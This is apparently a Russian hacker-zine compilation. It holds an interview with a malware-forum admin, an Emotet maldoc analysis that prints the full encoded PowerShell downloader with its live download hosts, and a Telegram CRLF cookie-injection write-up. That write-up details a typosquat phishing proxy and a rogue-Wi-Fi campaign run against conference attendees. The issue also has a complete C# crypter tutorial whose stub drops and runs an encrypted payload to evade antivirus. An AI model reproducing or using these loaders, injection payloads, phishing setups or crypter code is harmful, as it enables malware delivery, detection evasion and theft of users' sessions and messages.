Интервью.

Как познакомился с малварью? Какой был первый вирус?

- О, это целая история. Малварью начал увлекаться еще в школе, не помню лет наверное 14 мне было, на тот момент были популярны билдеры малварей, такие как "Апокалипсес", "Смерть ламера", эти билдеры до сех-пор можно скачать на моем сайте, хоть они неактуальны уже.
Так-вот, в то время только появился интернет, на диалапе и как-раз я подцепил вирус "Смерть ламера", мне стало интересно, что это такое, начал гуглить и понял, что такие штуки можно создавать самому.)
Далее я начал так шутить над школьными компами, было короче весело... Потом когда я стал более старше, интерес к малвари не прошел, мне стали интересны антивирусы, в плане настроек. Я начал экспериментировать с настройками, как антивирус ведет себя при смене настроек т.д.
Потом я стал искать единомышленников и на удивление нашел форумы, где люди общались на такие темы. В последствии это привело к созданию форума "Ру-Сфера", поэтому перейду к ответу на следующий вопрос.

Твой первый язык программирования, и почему именно он?

- Мой первый язык программирования был турбо-паскаль, если такой еще кто помнит.). Потому-что в школе, а после и в инсте его преподавали, программы писали мы в основном математические, расчет интеграла и т.д., короче голая математика.

Есть ли у твоего никнейма какая-то история?

- Истории какой-то нет, просто мой сайт называется "Ру-Сфера", от сюда и родился "X-Shar".))) Почему "Ру-Сфера", я сейчас уже и не вспомню.)

Почему решил сделать свой форум? История о создании ru-sfera.org

- Как написано выше мне было интересно изучать антивирусы в плане настроек и как они реагируют на малварь, также как оказалось в сети на тот момент было много форумов, на которых люди общались, были даже форумы фанов конкретных антивирусов.
Обитатели данных форумов, часто даже не были айтишниками, народ-был разных профессий, основной темой для общения были: это настройки антивирусов, тесты антивирусов, ключи для антивирусов. Да в то-время было интересно получать самому ключи для антивирусов, это был своеобразный квест, нужно-было зарегистрироваться где-то через прокси, либо просто установить антивирус себе на виртуальную машину. Ключи присылались на почту и форумчане делились ими. В итоге было весело и интересно, меня затянуло все это. Потом я подумал, а почему-бы не создать свой форум такого направления?
В то время, все форумы подобной тематике были на форумном движке vBulletin 3, но был еще мало популярен, но перспективен форумный движок XenForo, я как его поставил и сразу "влюбился в него", тут меня затянуло уже больше даже сайтостроительство, я начал развиваться в этой сфере, в последствии проявлял активность на форумах посвященных XenForo и делал "эксперименты" на своем форуме, было тоже достаточно интересно...

В целом интерес к малваре и тогда не пропал, по началу разделов/контента на форуме было немного, по моему три всего раздела было:

1. Промо-акции для антивирусов - Тут обсуждались всякие там промо-акции для получения ключей;
2. Безопасность системы - Тут обсуждались настройки АВ, различные проблемы и т.д.
3. Хакерский раздел - Тут не было на первых парах ничего кроме копипаста, да и программы в основном старался выкладывать деструктивные, типо-там "Апокалипсис", "Смерть ламера" и т.д.

Потом время шло, форум стал интересен обычным людям, не айтишникам, кто-то заходил, что-бы получить ключ для антивируса, кому-то было интересно обсудить настройки, тесты, или просто треп, типо "Какой антивирус лучше", была также и команда...)

В целом развивался и "Хакерский раздел", но в основном это были "Любительские статьи", типо там "Как спрятать вирус", "Как написать криптор".
Также выкладывался софт, типо ратников, троянов и программ-генераторов вирусов типо "Апокалипсес".
Вообще все выкладывалось, не для того что-бы кто-то кому-то навредил, всем было интересно это обсуждать.

Но со временем, интерес у людей пропал, в принципе с появлением соц. сетей, а в последствии и мессенджеров форумы сейчас не многолюдны как раньше...:(

Также-как, те кто был в команде повзрослели, обзавелись семьей, интересы поменялись.
Да и если говорить про меня, то у меня тоже изменились интересы, теперь меня стали интересовать более сложные вещи, мне стало интересны технологии,
как устроена малварь внутри и как это можно сделать самому.)

В целом мне и сейчас все это интересно, но т.к. исторически сложилось, что сфера моей деятельности, это низкоуровневая разработка, для каких-то железок.
То собственно и интерес сейчас именно к низкоуровневой малвари, а именно это руткиты, может-быть крипторы и т.д.

Вообще я сейчас изучаю разные операционные системы, в том-числе и операционные системы реального времени, очень интересно что-то там поделать, на уровне ядра.
Ну собственно и контент от меня будет в основном в этой сфере, если малварь, это изучение руткитов, если разработка, то это в основном "системное программирование" и разработка на уровне ядра.

Малварь на .NET, можно ли в 2020?

- Как я уже писал, моя сфера деятельности - Это низкоуровневая разработка, С# я использую очень редко, только для создания гуя.
Тем не менее, а почему и не создавать малварь на C#?
Что этому мешает, на C# кодить относительно проще, чем на С++, поэтому стиллеры, лоадеры, боты. Вполне себе-можно писать на С#.

Другое дело драйвер для винды, вы на C# не напишете, там на уровне ядра нетак давно С++ то появился.)))

Собственно поэтому и если речь идет о руткитах, тут уже старичек Си.)))

WhiteHat или BlackHat, и почему?

- Я себя отношу к WhiteHat, потому-что малварь для меня всегда была как стимул познавать что-то новое, в принципе и сейчас так, основная моя деятельность не связана с малварью, но интерес к малвари стимулирует познавать что-то новое, что в итоге помогает и по работе.)))

Писал ли ты коммерческую малварь?

- Нет не писал. На паблик писал кейлогеры, крипторы. Но на продажу нет. Бывает, что меня просят помочь с коденгом, кто пишит малварь в комерс, если человек адекватный и если есть время и возможность помочь, то неотказываю. Кто-то даже за это платит.)
Также с BlackHat бывает интересно пообщаться, узнаешь что-то новое для себя, у меня такого нет, типо я WhiteHat а блеки это позор и отстой. Нет, просто каждый сам выбирает свой путь, не мне кого-то осуждать, тем не менее я-бы не хотел заниматься чернухой, это не мое точно.)))

Где можно следить за твоей деятельностью?

- На моем сайте https://ru-sfera.org/
По сути форум сейчас почти как личный блог, решил развивать в основном темы "Системное программирование" и низкоуровневая разработка уровня ядра.

Также будут темы по изучению руткитов.

Также у меня есть аккаунт на гитхабе: https://github.com/xshar
На форуме есть контакты, но основная почта, где со мной можно выйти на связь, это: zoa88@pm.me

На этом вопросы подошли к концу, отдельное спасибо X-Shar за потраченное время на ответы на вопросы.

Dark $ide - with love ^_^

Если уж говорить о шляпных ресурсах то в наших славных руках есть очень гендерно нейтральный "app.any.run" на котором юные школьники ковыряют билды ваших любимых азорультиков, предаторов и остальной такой же хуйни из паблика, но иногда взрослые дядечки приносят туда очень интересные экземпляры, например билды тех же АПТ группировок. Давайте глянем какого мертвеца нам принесло морем из Поднебесной. Попробуем разобраться как он работает и что из себя представляет...

Ботя из Китая

Первичная нагрузка была доставлена на ПК с помощью макроса зашитого в DOC файл, это нормально для всех APT групп, не нужно кривляться и думать, что банковский работник обычно запускает что то другое. На самом деле это вполне нормальный контент для человека который открывает DOC файлы 12 часов в сутки, и одна из основных программ на рабочем столе этого человека это как раз клиент корпоративной почты. Ну вы поняли, ага?

Основная нагрузка этого документа - это скрипт в макросах и страница заглушка - говорящая нам что он открывается в другой версии MS Word.

Стандартная, слишком палевная, хуйня, - скажете вы. Я буду согласен, но при массовой рассылке: вам не похуй ли бы было? Хоть один да бы открыл. Ладно поехали дальше.

Тут в основном все строчки рассказывают нам о работе гугл хрома, потому что малварьхантер именно работал в хроме, потом запустил ворд, потом уже заработал макрос, нам придется просто чуть чуть потянуть ползунок полосы прокрутки вниз и увидеть как пауршелл запускает полезную нагрузку которую прячет в кодировке base64

powershell -w hidden -en JABDAGUAaABkAHAAcQB5AHMAPQAnAEQAeABlAG4AdQByAHEAdQBjAHcAYQBuACcAOwAkAFcAZgB4AHYAaABzAGoAdgAgAD0AIAAnADQANwAwACcAOwAkAEoAYwBsAGcAcgBqAHUAZABwAGcAZwA9ACcATwBkAGMAaABtAGsAeQB5AGIAawAnADsAJABRAGkAawByAG4AZAB1AGIAegBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABXAGYAeAB2AGgAcwBqAHYAKwAnAC4AZQB4AGUAJwA7ACQAQwBvAHMAbQBhAG8AcwBzAG0AZgBvAD0AJwBOAGoAagB1AG8AZwBvAGgAZgBnACcAOwAkAEEAaQB1AHkAcQBlAHEAZgBoAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBCAEMAbABpAEUATgBUADsAJABUAGoAdQB3AGYAagBlAHkAdwB5AD0AJwBoAHQAdABwADoALwAvAGIAawBqADIAMAAwADIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAFkALwAqAGgAdAB0AHAAcwA6AC8ALwB0AG8AcABhAGcAZQBuAGMAeQAuAG4AYQB0AGgAYQBuAG8AbgBsAGkAbgBlAC4AdQBzAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQAxAHAALwAqAGgAdAB0AHAAcwA6AC8ALwBkAHUAawBlAGEAdABhAC4AYwBvAG0ALwBsAG8AZwBpAG4AXwBmAG8AcgBtAC8AagBBAGwAZQAvACoAaAB0AHQAcABzADoALwAvAGgAbwB3AGUAbABsAHQAYQB4AGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGoAWAAvACoAaAB0AHQAcABzADoALwAvAGwAYQB1AHMAaQBuAGUAeABhAG0AZQBuAGUAcwAuAGMAbwBtAC8AZABpAHMAYwBsAG8AcwB1AHIAZQBzAC8ANgBiAHAALwAnAC4AIgBzAFAAbABgAEkAdAAiACgAJwAqACcAKQA7ACQAUwBhAGIAcQBzAGgAcgBrAHIAcAB1AGIAPQAnAFMAbgByAHgAaQBwAG8AdgB6AGEAcAAnADsAZgBvAHIAZQBhAGMAaAAoACQAUABxAG4AcAB6AGcAbwBrAHMAIABpAG4AIAAkAFQAagB1AHcAZgBqAGUAeQB3AHkAKQB7AHQAcgB5AHsAJABBAGkAdQB5AHEAZQBxAGYAaAAuACIARABPAFcAYABOAGwATwBhAEQAZgBJAGAATABFACIAKAAkAFAAcQBuAHAAegBnAG8AawBzACwAIAAkAFEAaQBrAHIAbgBkAHUAYgB6AHMAKQA7ACQARQBsAGkAdwBoAHUAcgBoAG4AcQA9ACcAWQB4AGMAdQB5AHAAaABjAHoAbwBhAHEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAGkAawByAG4AZAB1AGIAegBzACkALgAiAEwAZQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMgA2ADEAMQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFEAaQBrAHIAbgBkAHUAYgB6AHMAKQA7ACQARgB4AGIAYQBiAG4AdQBtAHkAaQA9ACcASAB6AGcAZQB3AG8AZABqAHMAbABhACcAOwBiAHIAZQBhAGsAOwAkAEgAYgBuAHEAbABzAG8AagBsAG0APQAnAFEAYQBoAGQAawBkAG0AZQBjAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBkAGIAZQBvAHEAdAB4AGEAcAB1AGwAPQAnAE4AcQBmAGQAdgBuAHgAcwBnAG8AdwBnAGkAJwA=

Итак разберем аргументы командной строки которые тут выполняются:

Вызывается интерпретатор powershell.exe; окно которого скрыто значением ключа -w с параметром hidden; и сам скрипт пауршелла у нас обусфицирован и енкодирован в строку в кодировке base64, и расшифровывается и запускается как обычная комманда с ключом -en.

Давайте расшифруем, деобусфицируем и посмотрим что там внутри:

$command = "JABDAGUAaABkAHAAcQB5AHMAPQAnAEQAeABlAG4AdQByAHEAdQBjAHcAYQBuACcAOwAkAFcAZgB4AHYAaABzAGoAdgAgAD0AIAAnADQANwAwACcAOwAkAEoAYwBsAGcAcgBqAHUAZABwAGcAZwA9ACcATwBkAGMAaABtAGsAeQB5AGIAawAnADsAJABRAGkAawByAG4AZAB1AGIAegBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABXAGYAeAB2AGgAcwBqAHYAKwAnAC4AZQB4AGUAJwA7ACQAQwBvAHMAbQBhAG8AcwBzAG0AZgBvAD0AJwBOAGoAagB1AG8AZwBvAGgAZgBnACcAOwAkAEEAaQB1AHkAcQBlAHEAZgBoAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBCAEMAbABpAEUATgBUADsAJABUAGoAdQB3AGYAagBlAHkAdwB5AD0AJwBoAHQAdABwADoALwAvAGIAawBqADIAMAAwADIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBiAFkALwAqAGgAdAB0AHAAcwA6AC8ALwB0AG8AcABhAGcAZQBuAGMAeQAuAG4AYQB0AGgAYQBuAG8AbgBsAGkAbgBlAC4AdQBzAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQAxAHAALwAqAGgAdAB0AHAAcwA6AC8ALwBkAHUAawBlAGEAdABhAC4AYwBvAG0ALwBsAG8AZwBpAG4AXwBmAG8AcgBtAC8AagBBAGwAZQAvACoAaAB0AHQAcABzADoALwAvAGgAbwB3AGUAbABsAHQAYQB4AGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGoAWAAvACoAaAB0AHQAcABzADoALwAvAGwAYQB1AHMAaQBuAGUAeABhAG0AZQBuAGUAcwAuAGMAbwBtAC8AZABpAHMAYwBsAG8AcwB1AHIAZQBzAC8ANgBiAHAALwAnAC4AIgBzAFAAbABgAEkAdAAiACgAJwAqACcAKQA7ACQAUwBhAGIAcQBzAGgAcgBrAHIAcAB1AGIAPQAnAFMAbgByAHgAaQBwAG8AdgB6AGEAcAAnADsAZgBvAHIAZQBhAGMAaAAoACQAUABxAG4AcAB6AGcAbwBrAHMAIABpAG4AIAAkAFQAagB1AHcAZgBqAGUAeQB3AHkAKQB7AHQAcgB5AHsAJABBAGkAdQB5AHEAZQBxAGYAaAAuACIARABPAFcAYABOAGwATwBhAEQAZgBJAGAATABFACIAKAAkAFAAcQBuAHAAegBnAG8AawBzACwAIAAkAFEAaQBrAHIAbgBkAHUAYgB6AHMAKQA7ACQARQBsAGkAdwBoAHUAcgBoAG4AcQA9ACcAWQB4AGMAdQB5AHAAaABjAHoAbwBhAHEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAGkAawByAG4AZAB1AGIAegBzACkALgAiAEwAZQBuAGAARwBUAGgAIgAgAC0AZwBlACAAMgA2ADEAMQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFEAaQBrAHIAbgBkAHUAYgB6AHMAKQA7ACQARgB4AGIAYQBiAG4AdQBtAHkAaQA9ACcASAB6AGcAZQB3AG8AZABqAHMAbABhACcAOwBiAHIAZQBhAGsAOwAkAEgAYgBuAHEAbABzAG8AagBsAG0APQAnAFEAYQBoAGQAawBkAG0AZQBjAGEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBkAGIAZQBvAHEAdAB4AGEAcAB1AGwAPQAnAE4AcQBmAGQAdgBuAHgAcwBnAG8AdwBnAGkAJwA="
$decodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($command));
Write-Output $decodedCommand

Результат обусфицирован плохо, вообще говнёво если сказать честно, один раз тупо прошлись, и видимо в ручную, как обычно я это делаю, потом разберемся как можно было бы сделать лучше, но лучше сейчас восстановим оригинальный код, для того что бы проанализировать что то там...

Немного приводим в порядок разметку, делая отступы где нужно и обращая внимание на то что бы код более или менее был читаем. Теперь нам тут и видно что переменные как полагается названы чисто ради обусфикации - рандомными наборами англ букв, и некоторые из них просто лишние. Немного уберем текстовые переменные, просто заменив их на текст, там куда они должны были подставится.

Итак в начале скрипта мы имеем всего две переменных, одна из которых название файла, который дропается на диск, вторая список сайтов с которых вкачивается этот файл, далее мы интерируем данный список и скачиваем файл до первой победы когда выполнима проверка на размер скачанного, потом запускаем красного петуха.

В принципе про загрузчик всё.

А наш дропнутый на диск файл как видим далее запустился и после этого еще вызвал процесс с ключём --9d4c526b. Что это нам говорит? А то что это Emotet.

Вот статья в Юном Хакерёнке https://xakep.ru/2019/09/17/emotet-is-back/.

Эта статья была позаимствована у моего хорошего зн��комого: @papz777

Dark $ide, with løve <3

Помимо официального клиентов активно используется домен telegram.me. Он служит как ссылка на контакт, инвайт-ссылка для добавления в группу или канал, через него также можно добавить стикеры. Если пользователь аутентифицирован в веб-клиенте, то там присутствует кука stel_web_auth, которая отвечает, на какой домен перенаправлять пользователя.

Вот примеры запроса к telegram.me с кукой:

GET /i_bo0om HTTP/1.1 Host: telegram.me Cookie: stel_web_auth=localhost

И ответ:

HTTP/1.1 302 Found Server: nginx/1.6.2 Date: Thu, 19 May 2016 22:02:23 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive Set-Cookie: stel_ssid=823678114; path=/ Pragma: no-cache Cache-control: no-store Location: localhost#/im?tgaddr=tg%3A%2F%2Fresolve%3Fdomain%3Di_bo0om Strict-Transport-Security: max-age=15768000

Стоит заметить, что в куке присутствует возможность вставить \r\n символы, что позволяет подделать заголовки ответов от сервера, или, например, целый HTTP-пакет. А это ведет как минимум к XSS (привет Internet Explorer).

Обычно, в случае CRLF для демонстрации уязвимости ставят заголовок Set-cookie, который устанавливает куку. Но у меня CRLF инъекция уже через куку, поэтому обойдусь :))

Вот пример подделки заголовков:

GET /i_bo0om HTTP/1.1 Host: telegram.me Cookie: stel_web_auth=localhost%0d%0a%20Header1%3a%20ok%0d%0a%20Header2%3a%20ok%0d%0a%20other:%20

Ответ:

HTTP/1.1 302 Found Server: nginx/1.6.2 Date: Thu, 19 May 2016 22:23:31 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive Set-Cookie: stel_ssid=1297301663; path=/ Pragma: no-cache Cache-control: no-store Location: localhost Header1: ok Header2: ok other: #/im?tgaddr=tg%3A%2F%2Fresolve%3Fdomain%3Di_bo0om Strict-Transport-Security: max-age=15768000

Заметь, что присутствует заголовок Strict-Transport-Security, что не позволяет добраться до заветной печеньки, если пытаешься использовать MiTM-атаку (человек посередине), несмотря на то, что у куки нет флага Secure. Значит куку можно поставить с помощью XSS (нет флага HttpOnly), но я её так сходу не нашёл.

И тут я вспомнил про одну особенность современных веб-приложений. Поддомен (blabla.telegram.me) может поставить cookie на главный домен (telegram.me). Получится, конечно, не open redirect, а хитрое перенаправление на чужой домен, при использовании домена telegram.me

Для этого, мне нужно:

1. Раздать свою Wi-Fi точку.
2. Перенаправлять пользователей на несуществующий поддомен, который ставит куку.
3. Заставить пользователя зайти на мой поддомен. С учетом первого шага — легко.

Когда пользователю кинут ссылку на приглашение, например, в группу — его перенаправит на фейковое приложение. Пробуем? Поехали!

Готовим фейк.

Воспользовавшись утилитой urlcrazy я сгенерировал свободные домены подходящие для фейка. Отлично подошёл telergam.org. Телеграм достаточно сложное слово, чтобы можно было не заметить смену двух моноширных согласных посередине.

Взял облачный сервер на месяц и сделал фейк. Ну как сделал фейк. Я воспользовался проксированием с помощью nginx. Используя модуль proxy_pass можно настроить проксирование всех запросов на другой сайт, таким образом зашедший на мой ресурс видел содержимое другого сайта, целиком и полностью, включая изменения в реальном времени.

Вот полный конфиг «фейка» главного сайта telegram:

server { listen 80; # слушаем 80 порт server_name telergam.org; #на какой домен откликаемся location / { proxy_pass https://telegram.org; #проксируем сайт телеграма }

А ещё используя модуль sub_filter можно заменять содержимое строки на произвольную. По образу и подобию было настроено проксирование на web.telegram, с некоторыми поправками — клиент отправлял на мой сервер текущий идентификатор сессии (и прочие данные из localStorage), номер телефона, браузер.

Что еще нужно для хорошей жизни? SSL! Ну продвинутые пользователи сразу заподозрят неладное, а присутствие «зеленого замочка» прибавляет к харизме фейку.

Поэтому регистрируем бесплатный аккаунт на cloudflare и получаем возможность закрыть от чужих глаз ip адрес сервера и заветный замочек 🙂

Теперь попробуй найти 10 отличий:

Но если посмотреть исходник, то там будет лишний js, который и отправляет данные жертвы на подконтрольный сервер.

Positive Hack Days

Не так давно, на конференции ZeroNights я уже игрался с MiTM’ом, раздавая «бесплатный Wi-Fi», подрезая SSL и собирая трафик. На этот раз дамп трафика мне был уже неинтересен, поэтому основной целью была раздача волшебных печенек в браузеры пользователей.

Шаг 1. Wi-Fi

У нас было 2 wi-fi pineapple, 4500 потенциальных жертв, 3 альфы, несколько 8 dbi антенн и целое множество Wi-Fi карточек всех сортов и расцветок, а также MITMf, DNSspoof, Mana Toolkit, strip-n-inject и проксирующий сервак с фейковым dns-сервером. Не то что бы это был необходимый запас для поездки. Но если начал собирать оборудование для MITM’а, становится трудно остановиться. Единственное что вызывало у меня опасение — это BeEF. Нет ничего более беспомощного, безответственного и испорченного, чем XSS зомби. Я знал, что рано или поздно мы перейдем и на эту дрянь.

На помощь приходят «ананасы», это специальные устройства для атак с помощью поддельной Wi-Fi точки. На конференции было два этажа, а хотелось покрыть максимальное количество людей. К тому же раздавался официальный Wi-Fi с SSID «PHD», поэтому оставалось только запитать устройство. Отлично подошла розетка и место под столом на первом этаже.

Ананасу помощнее, на втором этаже, повезло больше — ему достался ethernet-кабель, поэтому раздавался быстрый и стабильный интернет. «Альфа» с ноутбуком (эту же пару я использовал на ZeroNights) кочевала со мной. Вдобавок, я хотел приспособить mr3040 с OpenWRT, но из-за количества людей и малой мощности я оставил эту идею.

Ещё из Питера привезли мощный роутер Xiaomi, но из-за нехватки времени на прошивку/настройку он так и остался лежать в коробке. Тем более покрытие было уже достаточным для успешной атаки.

Шаг второй. DNS

Задача — записать куку на telegram.me, поэтому на сервере я создал поддомен i.telegram.me и отвечал на любой запрос установкой куки (без контента). Думаю, отдавать DNS с помощью DHCP смысла не много, но на всякий случай поставил unbound и открыл его миру (чтобы подключались). Сразу после PHDays пришла абуза, кто-то успел засканить dns и DDoS’ил им .gov сайты.

Еще были использованы утилиты DNSMasqSpoof и DNSspoof. Первый вариант почему-то глючно работал, поэтому остался последний.

Шаг третий. Инъекция

На этот раз использовать sslstrip/sslsplit/hsts bypass не нужно. Да и зачем палиться? Чуть что, браузер начнет кричать на невалидность сертификата, а надо, чтоб он пользовался интернетом. При сёрфинге жертва скорее всего перейдет на http ресурс, а я тут как тут. Поэтому вконец документа вставлялся тег
<img src="http://i.telegram.me/" onerror=remove()>

Все просто — отправляется GET-запрос на несуществующий домен, но фейковый DNS отвечает нужным мне IP-адресом, в ответ от фейкового домена приходит заголовок с установкой cookie. Так как тег — изображение, срабатывает событие onerror и тег удаляется.
Ребята из Hardware Village преложили делать инъекцию BeEf’а, чтобы полностью контролировать браузер жертвы, потом выводить на телике кто попался (да-да, как на конференции BlackHat). Не было времени, но в следующий раз надо заняться.

В результате, если пользователь зайдет на любой HTTP сайт используя мой WiFi, его браузер будет «заражённым», и когда он будет переходить по ссылкам telegram.me — его будет перенаправлять на фейковую страницу аутентификации.

Результаты

А вот результаты я ожидал получше…
В первый день активной атаки (когда на конференции находится максимум народа) — никого. Никто не зашел. В середине конференции несколько внимательных зашли на страницы сниффера, полазили по фейкограму. Ближе к ночи был один вход. Ну хоть так…

Ещё один вход был пол второго ночи, его можно так же засчитать за первый день.

На второй день я пошел перепроверять оборудование, все ли работает как надо? Я пробовал сам запускать браузер — всё круто, кука ставится, telegram.me редиректит, лог входа пишется. Пару часов сидел и перепроверял, в чем же может быть проблема. Народ цеплялся. Большинство было с мобильных устройств, но и ноутбуки охотно подключались. На Hardware Village к инъекции был запущен mitmf (с respoder’ом), на всякий случай. Опять два входа и опять ночью.

Выводы

Плюсы:

• Помните, когда сломали telegram журналистов? Там было очень явное палево — IP адреса взломщика, ведь telegram сообщает, с какого IP происходит вход. В этом случае IP адрес будет совпадать с адресом жертвы. А так как мы контролируем сам клиент, мы имеем доступ к переписке и возможность выполнять любые действия от имени жертвы.
• Даже если стоит двухфакторная аутентификация — не поможет.
• Кнопку выхода можем заменить на уничтожении сессионного идентификатора только на стороне жертвы, тем самым наблюдать за перепиской всё время, пока жертва не уничтожит активные сессии в настройках.
• Способ можно модифицировать и улучшить

Минусы:

• Пользователь вовсе может не зайти. Из 4500 человек на хакерской конференции пробив был менее 1%.
• Естественно, доступ к секретным чатам мы не получим.
• На невнимательных пользователей. Но лично я — не заметил бы.
• Если пользователь аутентифицируется в официальном веб-клиенте, кука перезапишется.

Статья была позаимствована с блога bo0om.ru

Итак, прежде чем приступить к кодингу, разберём какие варианты крипторов есть:

• Имея байткод (любой .exe). То есть, вы сможете закриптовать файл, не зависимо от языка, на котором написана программа.
• Имея исходники. Этот вариант предназначен только под программы, написанные на одном (с криптором) ЯП.
• Крипторы с полиморфом/метаморфом. Если вкратце, то при помощи этих техник ваш криптор будет жить дольше, за счёт изменения кода файла, но при этом без изменения функционала.

Подробнее о полиморфизме и метаморфизме можно почитать тут и тут.

В нашем случае мы будем писать криптор имея байткод. Приступим.

Первый затяг. Принцип работы нашего криптора. Код стаба.

В решении у нас будет два проекта. Стаб криптора, и сам криптор.

Криптор будет передавать зашифрованные байты стабу, а сам стаб их расшифрует, дропнет файл в рандомную папку, и запустит его. Звучит просто, да и на деле это будет несложно.

Создаём новый консольный проект:

Объявим необходимые юзинги:

using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Threading;

И теперь сделаем метод дропа файла в рандом папку и его запуска:

static void DropAndRun(byte[] bytes, string fileName) // В качестве аргументов принимаем байты и имя файла
        {
            string[] dirs = new string[] // Создаём массив папок, в один из которых будет дропаться файл
к                {
                    Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), // AppData
                    Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), // ProgramData
                    Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), // LocalAppData
                    Path.GetTempPath() // Temp
                };

            Random random = new Random(); // Создаём переменную random, для генерации случайного числа
            int pathIndex = random.Next(0, dirs.Length); // Определим индекс массива рандомно

            string filePath = dirs[pathIndex] + "\\" + fileName; // Переменная, в которой хранится полный путь до файла

            try
            {
                if (File.Exists(filePath)) // Делаем проверку на наличие файла в папке
                {
                    File.Delete(filePath); // Если файл существует, то удаляем его
                }      
                
                File.WriteAllBytes(filePath, bytes); // Записываем байты в файл
                Process.Start(filePath); // Запускаем
            }

            catch { }
        }

Далее просто скопируйте три метода: RC4 - который отвечает за шифр байтов, StringToByteArray - конвертирует строку в массив байтов, и XOR - который отвечает за шифр строки,

И импортируйте их в проект:

Осталось "собрать" главный метод, и стаб готов. А главный метод выглядит так:

        static void Main()
        {
              Thread.Sleep(6000); // Делаем небольшую задержку перед запуском
              byte[] encryptedBytes = StringToByteArray(XOR("[BYTES]")); // Сначала принимаем строку зашифрованных байтов (RC4 + XOR), декодируем XOR, в конце получаем зашифрованные байты.
              byte[] passBytes = Encoding.Default.GetBytes("[PASSWORD]"); // Получаем байты пароля для RC4
              byte[] decryptedBytes = RC4(passBytes, encryptedBytes); // Декодируем байты
              DropAndRun(decryptedBytes, "build.exe"); // Дропаем и запускаем чистый файл      
        }

Стаб готов, теперь копируем весь код и создаём txt файл, в который помещаем наш код.

Второй затяг. Пишем GUI.

Создаём новый проект Windows Forms.

Добавим юзинги:

using Microsoft.CSharp;
using System;
using System.CodeDom.Compiler;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Windows.Forms;

В конструкторе добавляем 2 textbox'a, 3 button'a, ну и пару label'ов:

Для кнопки выбора файла создаём диалоговое окно:

        private void button1_Click(object sender, EventArgs e)
        {
            OpenFileDialog dialog = new OpenFileDialog();
            dialog.Filter = "build.exe |*.exe";  // Фильтр
            if (dialog.ShowDialog() == DialogResult.OK)      
                textBox1.Text = dialog.FileName; // Добавляем полный путь до файла в textBox1            
        }

Добавим методы шифра, получения рандомной строки, конвертирования массива байтов в строку:

        static string ByteArrayToString(byte[] ba)
        {
            return BitConverter.ToString(ba).Replace("-", "");
        }

        static string RandomString(int size)
        {
            Random random = new Random((int)DateTime.Now.Ticks);

            StringBuilder builder = new StringBuilder();
            char ch;
            for (int i = 0; i < size; i++)
            {
                ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
                builder.Append(ch);
            }

            return builder.ToString();
        }

Ну и методы XOR и RC4 такие же.

Для кнопки генерации ключа получаем рандом строку:

        private void button2_Click(object sender, EventArgs e)
        {
            Random rnd = new Random();
            int random = rnd.Next(6, 20); // Рандом цифра от 6 до 20
            textBox2.Text = RandomString(random); //Помещаем рандом строку, с рандомной длинной
        }

Теперь добавляем наш txt с кодом стаба в ресурсы проекта:

И добавим код для кнопки Build:

        private void button3_Click(object sender, EventArgs e)
        {
            string bytesString = ByteArrayToString(RC4(Encoding.Default.GetBytes(textBox2.Text), File.ReadAllBytes(textBox1.Text))); //Шифруем байты, конвертируем шифрованные байты файла в строку

            CompilerParameters Params = new CompilerParameters();
            Params.GenerateExecutable = true;

            Params.ReferencedAssemblies.Add("System.dll"); // Добавляем ссылку на System.dll
            Params.CompilerOptions += "\n/t:winexe"; // Задаём тип выходных данных
            Params.OutputAssembly = "Crypted.exe"; // Имя файла

            string Source = Properties.Resources.Stub_2D2D; // Переменная, в которой хранится код стаба
            Source = Source.Replace("[BYTES]", XOR(bytesString)); // Заменяем строку [BYTES], на заксоренную строку с шифрованными байтами
            Source = Source.Replace("[PASSWORD]", textBox2.Text); // Заменяем пароль для RC4

            var settings = new Dictionary<string, string>();
            settings.Add("CompilerVersion", "v4.0"); // Указываем версию целевой платформы

            CompilerResults Results = new CSharpCodeProvider(settings).CompileAssemblyFromSource(Params, Source);

            if (Results.Errors.Count > 0)
            {
                foreach (CompilerError err in Results.Errors) // Если есть ошибки, выводим их циклом
                   MessageBox.Show(err.ToString()); 
            }
            else
            {
                MessageBox.Show("Crypted!", "2D2D Cryptor"); // Иначе, выводим сообщение, что всё гуд
            }
        }

Криптор готов, проверяем.

Ну и детекты (криптовал своего бота):

Ну, а на этом у меня всё, сам криптор вы можете найти на канале Lаборатория.

Dark $ide Admin, with love <3

Данная статья является переводом от зарубежного специалиста в ИБ

